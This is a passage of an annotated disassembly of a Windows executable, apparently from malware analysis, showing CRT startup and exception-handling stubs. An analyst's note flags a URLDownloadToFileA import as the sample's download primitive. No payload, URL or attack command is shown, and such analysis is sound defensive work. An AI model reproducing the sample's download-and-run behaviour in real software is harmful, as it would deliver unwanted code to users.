.text:004018F4 ; logic — confirm by expanding start, which owns the ebp frame used here.
.text:004018F4 8B 45 EC mov eax, [ebp-14h] ; presumably EXCEPTION_POINTERS* saved by start — TODO confirm
.text:004018F7 8B 08 mov ecx, [eax]
.text:004018F9 8B 09 mov ecx, [ecx] ; first dword of the record (exception code, if the above holds)
.text:004018FB 89 4D 88 mov [ebp-78h], ecx ; kept for the _exit call below
.text:004018FE 50 push eax
.text:004018FF 51 push ecx
.text:00401900 E8 0F 00 00 00 call _XcptFilter
.text:00401905 59 pop ecx
.text:00401906 59 pop ecx
.text:00401907 C3 retn
.text:00401908 ; ---------------------------------------------------------------------------
.text:00401908 8B 65 E8 mov esp, [ebp-18h] ; handler: unwind to the esp saved by start
.text:0040190B FF 75 88 push dword ptr [ebp-78h] ; exit code = value stored at 004018FB
.text:0040190E FF 15 90 20 40 00 call ds:_exit
.text:00401914 ; [00000006 BYTES: COLLAPSED FUNCTION _XcptFilter. PRESS KEYPAD "+" TO EXPAND]
.text:0040191A ; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
.text:00401920 ; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
.text:00401932
.text:00401932 ; =============== S U B R O U T I N E =======================================
.text:00401932
.text:00401932 ; Returns 0. Referenced by address from start+77 (DATA XREF), so it is
.text:00401932 ; handed to the CRT startup as a function pointer rather than called here.
.text:00401932 sub_401932 proc near ; DATA XREF: start+77o
.text:00401932 33 C0 xor eax, eax
.text:00401934 C3 retn
.text:00401934 sub_401932 endp
.text:00401934
.text:00401935 ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
.text:00401936 CC CC CC CC CC CC CC CC+ align 10h
.text:00401940
.text:00401940 loc_401940: ; DATA XREF: start+Ao
.text:00401940 FF 25 BC 20 40 00 jmp ds:_except_handler3 ; import thunk; its address is taken at start+0A, consistent with an SEH frame registration
.text:00401946 ; [00000006 BYTES: COLLAPSED FUNCTION _controlfp. PRESS KEYPAD "+" TO EXPAND]
.text:0040194C ; [00000006 BYTES: COLLAPSED FUNCTION URLDownloadToFileA. PRESS KEYPAD "+" TO EXPAND]
.text:0040194C ; Analyst note (review): 6-byte import thunk for URLDownloadToFileA (urlmon),
.text:0040194C ; the only network-capable import in this view and the obvious download
.text:0040194C ; primitive of the sample; its call site is in collapsed code outside this
.text:0040194C ; view. URL strings should be recovered from the data section when
.text:0040194C ; extracting indicators.
.text:00401952 00 00 align 4
.text:00401954 00 00 00 00 00 00 00 00+ dd 2Bh dup(0) ; zero padding to the end of the raw section data
.text:00401A00 ?? ?? ?? ?? ?? ?? ?? ??+ dd 180h dup(?) ; uninitialised tail (virtual size exceeds raw size)
.text:00401A00 ?? ?? ?? ?? ?? ?? ?? ??+_text ends
.text:00401A00 ?? ?? ?? ?? ?? ?? ?? ??+